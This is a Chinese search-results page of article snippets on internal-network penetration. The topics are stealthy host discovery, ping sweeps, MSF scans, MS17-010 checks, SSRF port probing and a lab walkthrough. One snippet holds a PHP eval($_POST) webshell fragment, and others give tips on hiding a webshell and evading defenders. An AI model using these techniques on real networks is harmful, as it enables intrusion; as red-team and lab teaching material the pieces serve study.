首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

静默内网存活探测

静默内网存活探测 一、前言 临近教育护网,再次来研究一个之前没有细究过的内容:静默内网存活探测,当你突破边界服务器进入内网的时候就会面临着这个问题,如何在不被发现的情况下进行内网探测。...如果使用如fscan等内网自动化探测工具产生大量的异常流量那么就必然会被发现,被发现那十有八九这台好不容易被拿下的服务器肯定就无了,毕竟蓝队最喜欢关机。这篇文章就来探讨如何这个问题。...二、正文 本文仅探究静默内网存活探测,不对前期的内网信息收集做过多的介绍 1、icmp协议探测 windows使用如下命令扫描192.168.1.0/24网段下存活主机,该方法流量和正常ping流量相似...首先看一下帮助信息: 可以使用如下命令查看缓存信息: nbtstat -c 5、shell脚本 shell实用脚本(探测内网存活主机) - 简书 (jianshu.com) #!...) 扫描工具: 【神兵利器】内网自动化快速打点工具|资产探测|漏洞扫描|服务扫描|弱口令爆破 (qq.com) 浏览量: 251

1.2K20

如何探测内网存活主机

在渗透中,当我们拿下一台服务器作为跳板机进一步进行内网渗透时,往往需要通过主机存活探测和端口扫描来收集内网资产。...我们将主机扫描的场景大致可分为三种,1)直接在webshell下执行,通过系统自带命令或上传脚本工具进行扫描探测 ;2)通过反弹shell进行内网渗透,msf等渗透测试框架自带一些扫描模块;3)通过socks...使用系统自带的命令来完成C段探测,虽然效率低,但不容易触发安全规则。如果服务器开启了防火墙或者禁ping,那么就会影响探测结果。...可以用来做端口探测。...2>$null} 03、基于MSF的内网主机探测 使用msf进行反弹shell进行内网渗透时,通过msf自带的扫描模块进行快速扫描。

3.8K21
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    如何探测内网存活主机

    在渗透中,当我们拿下一台服务器作为跳板机进一步进行内网渗透时,往往需要通过主机存活探测和端口扫描来收集内网资产。...我们将主机扫描的场景大致可分为三种,1)直接在webshell下执行,通过系统自带命令或上传脚本工具进行扫描探测 ;2)通过反弹shell进行内网渗透,msf等渗透测试框架自带一些扫描模块;3)通过socks...使用系统自带的命令来完成C段探测,虽然效率低,但不容易触发安全规则。如果服务器开启了防火墙或者禁ping,那么就会影响探测结果。...可以用来做端口探测。...2>$null} 03、基于MSF的内网主机探测 使用msf进行反弹shell进行内网渗透时,通过msf自带的扫描模块进行快速扫描。

    2K20

    最新批量探测内网机器脚本

    逐台寻找出网计算机效率太低,所以需要能够批量探测能够出网的计算机的方法。...例如,当我们拥有了一定的内网权限后,可以直接运行批处理脚本通过依次net use连接多台计算机的方式来进行批量探测,这里给出一个能够实现该功能的批处理脚本。...3.第6行、9行、13行所提到的NetInfo.bat,是被自动拷贝到远程计算机上执行的脚本,用来探测远程计算机能否通过指定协议连接互联网,我们可以结合本书第3.2和3.4节的内容,根据实际情况编写脚本...攻击者进入内网后,经常遇到所控制的计算机不能构建出网隧道的情况,一般会考虑横向突破内网的其他计算机,直到找到能够构建出网通信隧道的计算机,然后再安装反向远控软件进行深入分析以及权限维持。...内网管理员个人计算机 9. 部门领导的个人计算机

    17910

    内网漏洞探测扫描 - 信息搜集篇 - 渗透红队笔记

    内网扫描 当我们拿到了一台网络边界的时候,我们发现内网里还有很多台设备,比如邮件服务器,数据库服务器等等,我们可以通过网络边界做跳板对内网进行深层次的漏洞扫描。...下载地址:https://github.com/holmesian/ms17_010_scan ---- 在内网中,Ms17010这个漏洞很常见,因此我们可以通过Ms17010横向批量探测内网主机是否有此漏洞...还可以使用MSF自带的模块进行探测内网主机是否存在MS17010漏洞: msf5 auxiliary(scanner/smb/smb_ms17_010) > show options Module...---- CMD内网主机存活扫描 原理是使用ICMP的Ping命令去探测一个网段,目标是否存活: for /l %i in (1,1,255) do @ping 192.168.2....下载地址:https://github.com/k8gege/Ladon 一、多协议探测内网主机存活(IP、机器名、MAC地址、制造商) Ladon.exe 192.168.2.0/24 OnlinePC

    4.5K20

    内网探测协议出网

    当红队人员在进行内网渗透时,经常会遇到目标主机不出网的场景,而主机不出网的原因有很多,常见的原因例如目标主机未设置网关,被防火墙或者其他防护设备拦截设置了出入站策略,只允许特定协议或端口出网等。...在已经获取到目标系统的权限前提下,可以通过下述所讲到的各种协议探测手段来进行探测是否出网。...下面以不同类型操作系统自带的命令为案例,来进行探测http/https出网探测。...图片五.本篇总结 随着隧道技术的不断更新迭代,越来越多的攻击者利用隧道技术攻击企业内网,通过本篇文章从多维度分析隧道隐蔽技术的划分及对隧道技术整体来讲解,其中包含基础知识概括和相关隧道工具的利用方式及隧道隐蔽技术的检测防护方法...,并且通过大量的案例来演示了多个实际常见的隧道场景,比如我们通过拿到系统权限后利用多个协议实现隧道穿透、端口转发、内网穿透,总之,希望本篇内容对读者有所帮助。

    1.6K162

    内网渗透 | 手把手教你如何进行内网渗透

    上面呢,就是利用exp将一句话写入当前目录的shellx.php中。 ? get shell 到这里呢,想了想我们的目标是内网,并且防火墙没开,就不考虑提权了。...---- 0x02 跳板及内网探测 现在的目标是将此DMZ服务器当作跳板并探测内网的服务器。...还有一种方法是利用msf生成马儿让目标运行,反弹回来meterpreter查看路由添加路由,然后msf就可以访问内网,可以使用msf来探测以及渗透测试。 0x2.2 内网探测 这里首先有几种方法。...0x3.2 内网探测+跳板代理链 因为这是第二层内网,所以要连接webshell需要打开proxifier然后用AntSword进行连接。 ? ?...0x5.2 内网探测 Linux下还可以通过msf进行内网探测以及攻击: ? 步骤 ?

    9.7K22

    SSRF漏洞挖掘的思路与技巧

    只是探测内网地址的话属实不够看的,所以如果一个点存在SSRF,那势必要尝试一下能不能探测内网端口,比如,假设10.0.0.1这个地址存在,那我们可以尝试请求10.0.0.1:21、10.0.0.1:3306...总之笔者通过分析上下的代码,发现这个链接的构成是由赋予abc.php一个外部的url参数,在没有任何过滤,任何防护的情况下读取这个外部url并发起请求,就可以尝试是否可以读取内网地址呢?.../abc.php?...,来探测内网地址和内网端口,不过问题来了,上面刚才说内网地址那么多,我们要怎么才能知道呢,且慢,在Weblogicssrf的漏洞页面点击这里: ?...有网段了,就可以一点一点的探测了,探测内网的telnet,ssh,redis,以及各个数据库,为以后的内网漫游做好信息收集。

    1.3K21

    内网信息收集篇

    0x01 前情提要 在内网环境中,信息收集尤为重要。(通过多种协议)探测内网存活主机也属于信息收集的一部分。...php eval($_POST[angel])?>" 5、菜刀连 http://domain:8980/log.php angel 6、连上之后做一些基本的隐蔽目录、更改文件时间等隐蔽化操作。...以便确定下一步攻击方向; 【等级3】分别探测白天/夜间内网中所存活机器并且对应IP地址; 【等级4】对应人员的工作机内网IP,以及工作时间; 【等级5】根据信息业务反馈,制定目标安全时间,以便拖拽指定人员文件...探测等级1: net group "Domain Admins" /domain ?...后面可以结合 meterpreter 获取反弹 shell、测试内网段在线主机、获取主机操作系统信息、获取端口服务开放情况等。 注:可以在不同的时段(白天/晚上)探测内网段在线主机。

    86920

    实战 | 记一次基础的内网Vulnstack靶机渗透一

    -MySQL提权 构建通道 内网其它主机端口-代理转发 持久控制 1.域渗透-域成员信息收集 2.域渗透-基础服务弱口令探测及深度利用之powershell 3.域渗透-横向移动[wmi利用] 4.域渗透...img 登陆成功 发现在前台模板功能里面可以直接编辑php文件,我们一可以直接写入webshell并连接 ? img 我们在acomment.php中写入 ?...img 收集到一下关键信息: 该域名为god.org,域控为OWA$,域管理员为Administrator,内网网段为192.168.52.1/24,我们用Ping命令探测域控的ip ping owa.god.org...进一步深入(横向移动) 我们用以下方法探测内网存活的主机 for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.52....%I | findstr "TTL=" 用Ping命令探测内网主机 ? img 探测到一台内网主机,ip为192.168.52.141。我们添加一下路由,对该主机进行渗透 ?

    3.4K20
    领券